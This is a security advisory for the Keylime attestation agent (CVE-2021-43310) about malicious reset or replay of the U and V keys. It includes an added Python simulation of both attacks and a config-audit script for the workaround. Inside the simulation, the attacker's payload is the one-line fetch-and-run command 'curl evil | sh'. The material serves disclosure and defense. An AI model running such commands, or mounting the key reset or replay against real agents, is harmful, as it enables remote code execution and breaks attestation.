
Keylime: malicious reset or replay of U and V encryption

High
mpeters published GHSA-2m39-75g9-ff5r Jan 27, 2022

Package

keylime (Keylime)

Affected versions

<6.2.x

Patched versions

6.3.0

Description

Impact

This vulnerability allows an attacker to craft a request to the agent that resets the U and V keys as if the agent were being re-added by a tenant and verifier. Because the key the agent then derives no longer matches the one the verifier has on record, attestation of that node is broken from then on. As part of this request, new revocation and attestation actions can be added, and depending on how the agent is configured, this can lead to remote code execution.
In addition, an attacker could capture valid U and V keys together with a payload and resend them to the agent, because the agent cannot verify the freshness of the payload and there was no transport security for that data.
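To make the two attack paths concrete, the following is an added example that models the agent's key-delivery handlers; it is not Keylime's own code. It follows the advisory's description: the bootstrap key K is U XOR V, U comes from the tenant and V from the verifier, and the agent proves it derived K with an HMAC over its UUID (the auth_tag). Everything else is an assumption made to keep the example self-contained: the payload is protected with a toy HMAC-SHA256 keystream rather than AES-GCM, U is sent in the clear rather than encrypted to the agent's key, and the mTLS fix is modelled as a peer identity that the transport hands to the handler. The `Agent`, `provision` and `demo` names are invented for the example.

```python
import hashlib
import hmac
import secrets

# Added example modelling the flow the advisory describes; not Keylime's code.
# Simplifications (assumptions): toy keystream instead of AES-GCM, U delivered
# in the clear, and mTLS represented by a transport-supplied peer identity.

AGENT_UUID = "d432fbb3-d2f1-4a97-9ef7-75bd81c00000"  # constructed value


def derive_k(u: bytes, v: bytes) -> bytes:
    """Bootstrap key: K = U XOR V."""
    return bytes(a ^ b for a, b in zip(u, v))


def auth_tag(k: bytes, agent_uuid: str) -> str:
    """Proof that the sender knows K (HMAC over the agent UUID)."""
    return hmac.new(k, agent_uuid.encode(), hashlib.sha384).hexdigest()


def toy_cipher(k: bytes, data: bytes) -> bytes:
    """Keyed XOR stream for the example only; symmetric, so it also decrypts."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(k, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


class Agent:
    """Model of the agent's /keys/ukey and /keys/vkey handlers."""

    def __init__(self, require_authenticated_peer: bool):
        # Before 6.3.0 anyone who can reach the agent port may post keys.
        # From 6.3.0 only a peer whose certificate chains to the Keylime CA
        # can connect at all; `peer` stands in for that mTLS identity.
        self.require_auth = require_authenticated_peer
        self.u = self.v = self.k = None
        self.tag = None
        self.payload = None
        self.executed = []  # scripts that would have run as autorun.sh

    def post_key(self, which, key, peer, tag=None, payload=None) -> int:
        if self.require_auth and peer not in ("tenant", "verifier"):
            return 401
        if which == "ukey":
            self.u, self.tag, self.payload = key, tag, payload
        elif which == "vkey":
            self.v = key
        else:
            return 400
        if self.u is not None and self.v is not None and self.tag is not None:
            k = derive_k(self.u, self.v)
            if hmac.compare_digest(auth_tag(k, AGENT_UUID), self.tag):
                self.k = k  # silently replaces any key derived earlier
                if self.payload is not None:
                    self.executed.append(toy_cipher(k, self.payload).decode())
        return 200


def provision(agent: Agent, script: bytes, peer_u: str, peer_v: str):
    """One U/V delivery. Returns (K, the two requests as sent, worst status)."""
    u, v = secrets.token_bytes(32), secrets.token_bytes(32)
    k = derive_k(u, v)
    msgs = [
        dict(which="ukey", key=u, tag=auth_tag(k, AGENT_UUID), payload=toy_cipher(k, script)),
        dict(which="vkey", key=v),
    ]
    statuses = [agent.post_key(peer=p, **m) for m, p in zip(msgs, (peer_u, peer_v))]
    return k, msgs, max(statuses)


def demo(fixed: bool) -> dict:
    agent = Agent(require_authenticated_peer=fixed)
    # 1. Legitimate delivery; the verifier records K.
    k_record, captured, _ = provision(agent, b"echo provisioning", "tenant", "verifier")
    # 2. Attacker resets U and V with values of their own plus a hostile payload.
    _, _, reset_status = provision(agent, b"curl evil | sh", "anonymous", "anonymous")
    key_still_matches = agent.k == k_record
    # 3. Attacker replays the captured legitimate requests verbatim.
    replay_status = max(agent.post_key(peer="anonymous", **m) for m in captured)
    return {
        "reset_status": reset_status,
        "key_matches_verifier_after_reset": key_still_matches,
        "replay_status": replay_status,
        "scripts_run": agent.executed,
    }


if __name__ == "__main__":
    print("vulnerable:", demo(fixed=False))
    print("fixed:     ", demo(fixed=True))
```

In the vulnerable configuration the attacker's reset is accepted, the agent's key no longer matches the verifier's record, the hostile script runs, and the replayed capture runs the old payload a second time. With the authenticated transport, both the reset and the replay are refused before any key state is touched, which is the property the mTLS change provides.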

Fix

The communication between the agent and the verifier and tenant is now encrypted and authenticated using mTLS.
On the agent, a Keylime CA (by default the cv_ca) is configured and used to authenticate the verifier and tenant.
During registration the agent also provides a certificate, so that the verifier and tenant can verify the connection to the agent as well.

Going forward, the Keylime CA on the agent will be used to ensure encrypted communication between the agent and the Keylime server components, and its use is mandatory.

This fix also closes potential information leakage of UEFI and IMA logs through the quotes interface.

Patches

Users should upgrade to at least 6.3.x.

Note that if you want to upgrade the server components before the agent components, upgrade to 6.3.0 first.
6.4.0 will drop support for API version "1.0" to enforce the new protocol.

Workarounds

To block the remote code execution, change the following options in keylime.conf:

  • extract_payload_zip = True to extract_payload_zip = False
  • payload_script=autorun.sh to payload_script=

Note that this still allows an attacker to overwrite the payload.
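The workaround is easy to misapply (for example by clearing only one of the two options), so here is an added example, not Keylime's own code, that audits a keylime.conf for both settings. It assumes the options live in the [cloud_agent] section and treats a missing option as the insecure value the advisory tells you to change from; the two sample configurations are constructed for the example.

```python
import configparser

# Added example (not Keylime's code): check keylime.conf for the workaround.
# Assumption: the agent options live in the [cloud_agent] section, and a
# missing option is treated as the value the advisory says to change from.

VULNERABLE_CONF = """\
[cloud_agent]
extract_payload_zip = True
payload_script = autorun.sh
"""

HARDENED_CONF = """\
[cloud_agent]
extract_payload_zip = False
payload_script =
"""


def audit(conf_text: str, section: str = "cloud_agent") -> list:
    """Return a list of findings; an empty list means both mitigations are set."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    if not cp.has_section(section):
        return [f"no [{section}] section found"]
    findings = []
    if cp.getboolean(section, "extract_payload_zip", fallback=True):
        findings.append("extract_payload_zip is True: delivered zip payloads are unpacked")
    if cp.get(section, "payload_script", fallback="autorun.sh").strip():
        findings.append("payload_script is set: an unpacked script would be executed")
    return findings


def audit_file(path: str) -> list:
    with open(path, encoding="utf-8") as fh:
        return audit(fh.read())


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or ["ok"])
```

Run `audit_file("/etc/keylime.conf")` on an agent to confirm the change took effect; both findings must be absent, since leaving either option at its original value keeps the code-execution path open. The payload itself can still be overwritten, as the advisory notes.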

Credit

Many thanks to Matthias Gerstner and Thore Sommer for both finding this issue independently.
The fix was developed by Thore Sommer.

For more information

If you have any questions or comments about this advisory:

Severity

High

CVE ID

CVE-2021-43310
